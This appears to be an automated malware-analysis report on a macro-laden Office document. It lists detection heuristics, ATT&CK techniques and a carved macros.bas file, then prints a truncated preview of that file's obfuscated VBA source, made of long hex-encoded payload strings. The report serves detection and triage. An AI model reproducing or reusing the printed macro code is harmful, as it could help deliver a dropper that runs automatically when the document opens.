Verdict: MALICIOUS
Risk Score: 264

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution
The sample contains VBA macros, including a Document_Open and Workbook_Open macro, which are designed to execute automatically. A critical heuristic firing indicates a Shell() call within the VBA code, suggesting the execution of an external command or script. The presence of a long encoded blob within the macros further supports the likelihood of a downloader or dropper functionality, aiming to fetch and execute a secondary payload.
Heuristics (8):
- ClamAV: Xls.Malware.Cwsp-6735643-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Xls.Malware.Cwsp-6735643-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Workbook_Open macro (high, OLE_VBA_WBOPEN): Workbook_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19305 bytes |

SHA-256: 218d57d5e9e961af9f6e86370449035db2c9011c0e4bd42a0de6b8f06143bf2e

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 72 long base64-like blob(s))

Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub IGT_MP()
    Dim KSP_Z As String
    Dim GYQ_I As String
    Dim I_FZQ As String
    I_FZQ = "8AC2C88A8A808A8A8A9E8A8A8A998A8A8A7B8A548A8A8A8A5D8AC79A778A8A96508A90C1B490B18A7E8A4E8A8A8E8A7EBE8A8A8AA5838A8A8C8ABA6E8A8A8A6A8A8A8AC095988A72A5AC8A778A8A678A5C705E8A8A798A7F8A8A8D968A8A8A83B16C8A73A78"
    Dim MLW_H As String
    MLW_H = "A517D8A7D8A8A8A8A9EC58A8A8A59A78A608A60998A8AC3568A8A668AA98A8AAF588A8A8A6B8A4B8A8A8AAE8A8AC6A38A4E5E8A8A8AA1628A8A8A8A8A66A08A8A8A6AAC8A8A8A77AA55635F6D7DC38A8AA6C8528AA0B28A8C8A8AA061968AA38A9E8AC883AD"
    Dim GP_AZO As String
    GP_AZO = "B38A8AC9A3978A8AB7C37D588A8A8A8A8A8A926B548AA4605F9F8A8A8A908A8A8A8A8A54848A668A6EB96D548A8A8AC0B68A8A8DAA8A8AB38F8A896E8A7D828A7B8A8A8AC5BA8A8A7782578AAA8A8AA48A5F8A908A8AB08A6F8AC28A878AAD718A558A8AB68"
    Dim SI_ZOA As String
    SI_ZOA = "A8AC48AB8A6228AB68FA36E8A8A868AA58A8AA18A58AA8A978A6A848A8A8A8A638A64798AC08A578C8A8AC38A4B625F8A8A648A6B8AA99E8A8AAEC68AAD6C8AACA88A8A844C68578A8A99548A8A8AB78A8AA28A9B7992988A8A968A618A8A998A8895BD8A8A"
    Dim IV_DYM As String
    IV_DYM = "8A8A8A5A948A818A8AAD8A6CB88A8A8A8A8A8A85638A8A798A8A948A724E8A898A9D698A8A998AAFB78A8AB88A8A8A8AAE8AAA8AB78A665E9D8AB3AE698A965682C88A72958A8A508A8A8A8A8AC4768A988A8A8A8AC38A5E8A4F738A8AC48AC77C8A8A638A8"
    Dim ESL_HG As String
    ESL_HG = "A74B28AA5769E8A4E8A82C98AB87A9C8A5D8A9AC95A8A8A9F7FBA70B9B48AA18A8A9F8AC98A978A628A608A558A578A7691C3708A7AC58A8AA4708A788A8A4B8A8A8A63C78A4F8AAD8AB2978A8A9487AEC68D6DC07C8ABB8A7B8AAC8AC58A74605A5F4F8A78"
    Dim JHQ_IQM As String
    JHQ_IQM = "A38C8A8A6C8A788A5B8AA38A95C18A8A828A89968AC4748A788A6EC78A7F83BA998A8AB98A8A8A8A9FC6C3838A8A8A8AAA8A8A8AC38A8A8A8A8A55BF8A8A8AAEAB8A4C8C8A8A568A8A8A8AAF8ABC8AC8A38A8AB7BD638AC88A8A8A8A8A8A9AAF8A678A688C8"
    Dim R_M As String
    R_M = "A6D8A8A8A5DA28A968A8A8F8A8A788A8AC8868A8A658A8B8AA88A958A8A9FB4AB615B8A8A8A988A7063BE539499678A6CB88A97A3998A7D8A8AB774578A8A8F638AB88AACB37B8A8A8A8A8A8A8C63748A8A68528AB18A8A8A638A8A8A7CB58A8A578AB997BF"
    Dim CRW_ZQ As String
    CRW_ZQ = "8A958A92765B8A8A8A8A8A8AAD7AAC8A9A8A8A9D8A6F8A8B8A7B8A8A8F92A3999E8A67AB968AC37F8A7280818A548AA78A8A6A8A7D6C6D708A518A8A91C2C5918A8A9D8A5D4C8A8A8A9C8A8A8A8A8B8A738A667DC98A8A90678A8A5E8A8A4C8A8A948A738A8"
    Dim EOR_SIU As String
    EOR_SIU = "B8AA38A81989F5B7F508A8A6859BC6B8E67C78FC88AAD8A8A4B8A8A8A8A8A7CB38A9E858A8A8A818A57AF8AC28A8A8A8A8A78788A539EC98A8A81A08A89975AB48AC58A819198A6909FBB8AC5887479BD6A85B38A4F8A8A8A8A81A68A8A978A638A588EA18A"
    Dim CW_JR As String
    CW_JR = "A49A7E8A8A8A4FB0BB528A4E8A91AF8A8AC65B8A8AAF528ABA8A7A8A8A8A8A7F8A688A4D7F8A8A8A8A8A8A7F8A8A93C15A8A898C4C8A8A8AA6AE808A7A878A638A9B92518A8A8B5199B08A8A86598A8AAD8A8A8A8A8AB7588A9E8AAB9E8A548A8A8DAC8D8A8"
    Dim R_AF As String
    R_AF = "A658A868A6894666AA08A8A8A8AB78AA68A8A8ABA8A8A8A8A81728A8A70A68A598A8A8DC76E8A8A8ABD8A677C908A8A8A8AA38A8AC45D8AB38A8A8A4D8A568A4E637BC18A8ABC8A7EBE8A4F8A8A8ABB8A4D7D6CA06E8A4E5B8A9CBFAC8A8A718A8A8A7C8A8A"
    Dim F_ZC As String
    F_ZC = "848AAC8F8A585CC58A638A8AAF8AB38A78B18A8AA39D8A4C8AA672608A64948A8A915C4D8A8A8A934C8A6C87698A8CA18A5293878F59A08A7A8A9D8A76A88A664C8A689267AE8A8A785B9CB58A878D8A8A5D4B8ABE8A8A6B8A818A8B678A8A5186B98A8A85B"
    Dim O_ZK As String
    O_ZK = "25CC95A7F8A8A5C8AC35B8A8A8A8A65A188B4A08A8A8A908A8A8A8AB18AC58AA79A4C8A8A898A515A908ABE8A8A8A8A8A8A7CA98A898A9C846D8B5A6A82728A8A8A83A18A8A8ABD9A8A964D8AB2B68A4B8A678168C38A93C38A8A8A8A685E8A9A8A8A9D737D"
    Dim H_M As String
    H_M = "8A9F9D8A9AB28A8AAA69958A57C48A658A6C9B8D4C8AB360788A8A8A6753518AA4B67B8A8A8AAA8A738A8AC351AF8A7F8A8A4C8A7BAC8A88A9ABBD8A8AA1638A978A948A9A8A8ABA8A8A4D8A8A8A8A8A8A8B798ABE858A8A8A8A8AB98ABA7B8A8A77AF657C8"
    Dim I_J As String
    I_J = "A8A618AABA2A9968A8AC28A798A618A628AB1C58A8AAD8A4C8AB48A8A8AC08A4DB463515D8ABB8A8A8A8A8A658A8A9E8A8AA86FC09E8A8A8AA5536B8AB78A8A8A5B9954748AC785BF718 ... (truncated)
```